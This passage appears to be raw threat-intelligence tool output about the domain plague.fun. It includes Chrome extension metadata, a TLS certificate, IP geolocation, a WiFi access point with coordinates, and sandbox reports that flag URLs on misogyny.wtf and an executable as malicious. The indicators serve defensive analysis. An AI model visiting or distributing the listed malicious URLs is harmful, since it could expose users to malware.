"https://lh3.googleusercontent.com/Q6A61RgzCT3Fsha5p3p_mYUuD_ulqAPXk7PqjmQ0kKyA7-gCxlIDyggIfaIGhhAvmO0UFfQk0cZbcTBVSG7iQtCh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1, "name": "CS GO HD Wallpapers New Tab"}, "fpmmkkfgclmhcolgmcpjdkfpehgbedim": {"rating": 5, "users": 1000, "platform": "", "short_description": "Replace your new tab with the PUBG Features Custom page, with bookmarks, apps, games and PUBG Game pride wallpaper.", "icon": "https://lh3.googleusercontent.com/8FgkvHkd8sXLvGpg-QpO56iMck1xP9Bv3bV6OwkflKNyr6P2t8wDU1tCFg_N3rlo4f8T730LemwO9w1rH_uQ_t5o=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5, "name": "PUBG Features Wallpapers HD New Tab"}, "hhpdpohbancinfchpkgliloaocffpceb": {"rating": 3.3666666, "users": 776, "platform": "", "short_description": "Are you ready to be a gunner? Knock balls is a shooting game. Hard levels await you.", "icon": "https://lh3.googleusercontent.com/roRilPyAjm7U77eNqM3m2geyI7mMVOEsYkMdZpqIOQS6cO3GhqVYfi9fHPLCNM2lNCjWZB-HmOQpvaDvJGH7MzyDE_A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Knock Balls Game New Tab"}, "dodmbeoncpkfkefgbfiahafdgiccfhmb": {"rating": 4.9995656, "users": 5050, "platform": "", "short_description": "Check Out Our Fortnite Lama Live Wallpapers And Mini Games Date And Time Widgets...", "icon": "https://lh3.googleusercontent.com/76unrUKGATgdPR0Zl3po_OK3mWOQ82IhyHePJdSoxHIIw4pgCnqruTlz8g85NzGl5oqaV0fU0Kk=w128-h128-e365", "rating_users": 2301, "name": "Fortnite Lama Live New Tab Backgrounds"}, "pmnbmfmpehpncbfjfpnfailicicocaap": {"rating": 3.3043478, "users": 1482, "platform": "", "short_description": "Do you like American football game? Believe in yourself, see the goalkeeper and the wall that you really need to pass.", "icon": "https://lh3.googleusercontent.com/jluPSHf4IjMjgqd0rNVMuTfq1f4786G1iiu5koA7B4jo2el8s3MKIzpNpo-cmXd9ET9SnGZW=w128-h128-e365", "rating_users": 23, "name": "Kick Return Football"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "klaadibaiofhdchfigelkbnoilocpapa": {"rating": 1.7822802, "users": 100000, "platform": "", "short_description": "New tab themes with Clash Royale HD wallpapers made by fans for fans of Clash Royale.", "icon": "https://lh3.googleusercontent.com/Zz6C2fCYPAHQ9G9Z9rnDfohq1lnrZPvzCCT0vZkxEOnEOb-35_EZkNvdjWX8ALQpAqLlTdEul2A=w128-h128-e365", "rating_users": 2912, "name": "Clash Royale Wallpaper HD New Tab Themes"}, "fedenmemklhminihgehhicdmabenpkhd": {"rating": 3.6133332, "users": 1000, "platform": "", "short_description": "Fortnite wallpapers extension offers great images with every new tab and was made for all fans of Fortnite wallpaper.", "icon": "https://lh3.googleusercontent.com/DDwo5cVMwI5AIhAp_pmp6dCl7JL38sHImtQCS2gjwmiO2iGtwrmdQfst1YlkUq2wQE-N4ixZzwTyr2lpHWEXdp_tfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 75, "name": "Fortnite Game Full HD Wallpaper New Tab"}, "dephgmdllolfchlbencncbldjdnkdbok": {"rating": 3.1818182, "users": 735, "platform": "", "short_description": "Minecraft Classic wallpaper extension offers great images with every new tab and was made for all fans of Minecraft.", "icon": "https://lh3.googleusercontent.com/dM50b9FV4NBcF-X2FZPwy0kUtjr5uAf_1wvRVnVhPHiT0OzLRE6h7NCKBYDrgwrVikJc1qWIZBw91eUo-lAYKJ7F=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11, "name": "Minecraft Classic HD Wallpapers New Tab"}, "hbioademamgcidpknbkilibejpjhhoak": {"rating": 3.8666666, "users": 0, "platform": "", "short_description": "Among Us Skin wallpapers extension offers great images with every new tab and was made for all fans of Among Us.", "icon": "https://lh3.googleusercontent.com/li2kmYtixEszT4j4Le_YmQs49UUBS8X3gG00bFEbdNf16BEBDOxwf6doLGLTN3dBepgsAwyg0at3Wn2rhnoazmLp=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 45, "name": "Among Us Skin HD Wallpaper New Tab"}, "omihfdplpkjcgdkdhoeaclgappcanifp": {"rating": 3.3085105, "users": 0, "platform": "", "short_description": "Among us wallpaper extension offers great images with every new tab and was made for all fans of among us.", "icon": "https://lh3.googleusercontent.com/YaKEbQcoP38TLla09rRswmU6hU8dR1-9nHTE7LYzAPwCm5_pK4TEjA6grkmDEODxAr6_1m-2N9EQbjC9suBfKzkEtA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 94, "name": "Among US Game HD Wallpapers New Tab"}, "dnnkelgikdlinelhmlpipkipmnfeplhp": {"rating": 4.0833335, "users": 284, "platform": "", "short_description": "Cat wallpapers extension offers great images with every new tab and was made for all fans of Cat.", "icon": "https://lh3.googleusercontent.com/I_EAJDo-eiJhq-8CLSqi3_SGwaA57lw48w0g_SRK3a7BS3vBZvWH0o6HBCMarfyB9zWaJRlDcgaY5E3P4k3G6Vop=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 24, "name": "Cat HD Wallpaper New Tab"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": "XXXTentacion 4K Wallpapers New Tab"}, "fiaeliimiajnkmkncccmccnlcpcelpee": {"rating": 3.5, "users": 2000, "platform": "", "short_description": "Roblox wallpaper extension offers great images with every new tab and was made for all fans of Roblox wallpapers.", "icon": "https://lh3.googleusercontent.com/ChzPepItXsUfcsLgwHN82g5n1KCZo_ssLSO4u-NZqZLypgQvBs-Zrbv7V8r6q6py9pAlZrnm-FRAKYgQD-BqofVR=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 22, "name": "Roblox Game HD Wallpapers New Tab"}, "oefnjcadfloohhbchkdmgoecoohonhpn": {"rating": 4.7777777, "users": 1000, "platform": "", "short_description": "Install PUBG HD Wallpapers New Tab Theme ang get HD images of PlayerUnknown's Battlegrounds Battle Royale gameplay.", "icon": "https://lh3.googleusercontent.com/U37Bdee8tejEzgCfbkF51-OLn6ENkBDJvHobXQLQG0hDXCyxQVHIZ8LffkazMFHdpZJJqp4XSbooLtSKGmgvmebncQs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 36, "name": "PUBG HD Wallpapers New Tab Theme"}, "bhnklgpilfifbkahialpmbnhmpoaiomh": {"rating": 3.7777777, "users": 0, "platform": "", "short_description": "The Simpsons wallpapers extension offers great images with every new tab and was made for all fans of Simpsons.", "icon": "https://lh3.googleusercontent.com/oGZpMcoYYMqEocHdrSNjmlNd_fjhOPUZE-3XZw6zRTa4n2rlYn8OWUGT7v2A_lJps7K4KpjQGSAzdBzEaspSAxCYQhA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "The Simpsons 4K Wallpapers New Tab"}, "cadippdoonnecjfembbfokijpncaiefh": {"rating": 3.5089285, "users": 3000, "platform": "", "short_description": "Easter wallpapers extension offers great images with every new tab and was made for all fans of Easter.", "icon": "https://lh3.googleusercontent.com/-pcJqD8Bf8eTrfQ0S58g3FO29D1OqhWZmKRcZzd4FriR60v1xlIZwhU-yKoGx_tOLCEy97QVIukcsX_OxbztNVPNAA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 112, "name": "Easter HD Wallpaper New Tab"}, "khiclbcknnlgfglgablmakmkhpnclolo": {"rating": 3.0769231, "users": 443, "platform": "", "short_description": "PUBG Battle Royale wallpapers extension offers great images with every new tab and was made for all fans of PUBG.", "icon": "https://lh3.googleusercontent.com/PSigIBqr7dDCtEnN-xQ9DfASfpO-qdYWFcpf0WYRNEyy_tlFCpaguFXk5ahrW_L4yNe6SHQwM2mnMYnGQStollZlcLM=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13, "name": "PUBG Battle Royale HD Wallpapers New Tab"}}, "manifest": {"update_url": "https://clients2.google.com/service/update2/crx", "description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "icons": {"128": "icon128.png", "32": "icon32.png", "48": "icon48.png", "16": "icon16.png"}, "chrome_url_overrides": {"newtab": "newtab.html"}, "background": {"scripts": ["background.js"]}, "version": "0.37", "manifest_version": 2, "permissions": ["webNavigation", "tabs", "https://home.newtabgallery.com/*"], "browser_action": {"default_icon": {"32": "icon32.png", "16": "icon16.png"}, "default_title": "Plague Inc HD Wallpapers New Tab Theme"}, "name": "Plague Inc HD Wallpapers New Tab Theme"}}, "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj"}, {"platform": "Chrome", "version": "1.0.2", "data": {"entrypoints": {"chrome.tabs.query": {"/tmp/lgglnjfaglblnglkdmmdhmjcpplmjdfj_1.0.2/newtab.js": [3]}}, "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2021-12-22", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "" plague.fun
2022-12-18 00:06:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 62:2e:6e:14:8d:41:a7:bb:0e:68:24:08:35:d3:3a:ea:e6:12: ce:9a:66:04:e2:c6:aa:5b:e4:4d:cc:31:b7:05:c8:4f:da:d7: d5:d6:10:3e:24:7f:af:0c:2d:0a:54:a4:15:d7:2c:54:07:df: 80:be:82:e8:96:f8:df:13:0f:ca:15:85:8c:8d:ca:d0:c7:67: 5f:86:6d:5d:8e:88:a2:b2:15:b1:05:8e:c8:b9:11:6d:8f:45: eb:c2:e1:17:34:0a:fb:7f:08:95:52:e0:0f:1f:cf:a2:f8:5e: 69:d3:9a:86:38:fe:d7:84:40:b6:45:97:0e:3d:ed:23:c6:a6: ca:7f:d1:93:02:99:0d:64:b3:6a:a4:7b:b4:a9:d7:ad:9a:ea: 42:25:40:f9:3d:9a:2a:90:83:d8:92:96:ac:14:90:ef:93:ff: 94:66:f7:1b:6a:31:a2:4f:de:41:d1:2a:db:6e:69:90:2e:7d: 4a:64:c1:35:93:6d:6c:81:fa:e5:ee:8e:df:8c:78:eb:8c:af: bc:01:e0:1c:88:97:75:c8:83:4a:56:b4:d5:8a:03:a1:10:24: 2e:e6:a1:32:ec:3e:b8:79:f4:13:27:29:6a:93:6c:87:c4:ca: 7a:66:fa:f4:e5:1c:05:80:a9:2f:34:cf:9c:4e:49:fb:58:1a: 72:6a:04:0c
2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None Italy Bergamo, Lombardy, 25, Italy, IT
2022-12-18 00:36:48 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.ddns.net plague.fun
2022-12-18 00:12:18 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3037::6815:13f3', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3037::6815:13f3
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) 37.7803446,-122.3906132
2022-12-18 00:04:12 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 
0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ca8_ConnHashTable<3240>_HashTable_Mutex"\n "IsoScope_ca8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_ca8_IESQMMUTEX_0_331"\n "IsoScope_ca8_IE_EarlyTabStart_0x91c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "G860FG14.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n Dropped file: "EWM9224B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n Dropped file: "3LR45Z23.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': 
u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF66C2219AA8EED58C.TMP" has type "data"- Location: [%TEMP%\\~DF66C2219AA8EED58C.TMP]- [targetUID: 00000000-00003240]\n "_FA9E4B4C-7574-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "G860FG14.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "EWM9224B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n "~DF3C52B6399075EFBC.TMP" has type "data"- Location: [%TEMP%\\~DF3C52B6399075EFBC.TMP]- [targetUID: 00000000-00003240]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3LR45Z23.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003240]\n "_9A913025-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD4AE018E87DABDD4.TMP" has type "data"- Location: [%TEMP%\\~DFD4AE018E87DABDD4.TMP]- [targetUID: 00000000-00003240]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._9A913023-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section 
info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/grab/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/91 Antivirus vendors marked sample as malicious (10% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': 
u'638f5a030d35cf1e924e752e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'sha512': u'93acf54f3244d24de431cea4c1df9c9e8bebb2019266f177c1197d434b21cc1f4a49196b7c7b592d395b5609c23630025100a7435b58b6e027edf7a8eb372375', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'submission_id': u'638f5a040d35cf1e924e752f', u'created_at': u'2022-12-06T15:04:36+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:04:36+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 5, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'70c5a18bdec227528eed1b20f93b6aa1', u'network_mode': u'default', u'processes': [], u'sha1': u'7761d83a3b60cb69d52f94b37206195f0f04469d', u'url_analysis': True, 
u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [], u'type_short': []}] misogyny.wtf 2022-12-18 00:05:47 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 1, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': 4, u'submit_name': u'Sims2RPCSettings.exe', u'signatures': [{u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-99', u'name': u'Contains ability to download files from the internet', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'Observed function downloadfile in 5822e87fe484f98cd455b13b7db364f91838e8dd0c87a83bd991f490e5483d51.bin'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"lazyduchess.github.io"\n "ocsp.sectigo.com"\n "ts2.strangetown.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n 
"Local\\ZonesCacheCounterMutex"\n "RasPbFile"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-3', u'name': u'Loads the .NET runtime environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"Sims2RPCSettings.exe" loaded module "%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" at 665C0000'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTSYNCDELTATIME")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\1916A2AF346D399F50313C393200F14140456616"; 
Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\2A83E9020591A55FC6DDAD3FB102794C52B24E70"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\2B84BFBB34EE2EF949FE1CBE30AA026416EB2216"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\3A850044D8A195CD401A680C012CB0A3B5F8DC08"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\43D9BCB568E039D073A74A71D8511F7476089CC3"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\471C949A8143DB5AD5CDF1C972864A2504FA23C9"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A"; Key: "BLOB")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-7', u'name': u'Contains PDB pathways', u'attck_id_wiki': 